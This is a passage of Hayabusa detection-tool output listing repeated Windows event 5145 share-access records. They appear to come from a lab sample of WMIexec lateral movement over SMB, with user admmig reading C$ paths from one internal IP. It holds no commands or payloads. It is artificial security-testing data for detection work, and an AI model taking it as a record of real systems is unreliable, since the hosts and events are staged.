Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.222 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.238 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.253 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.269 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.285 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.300 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 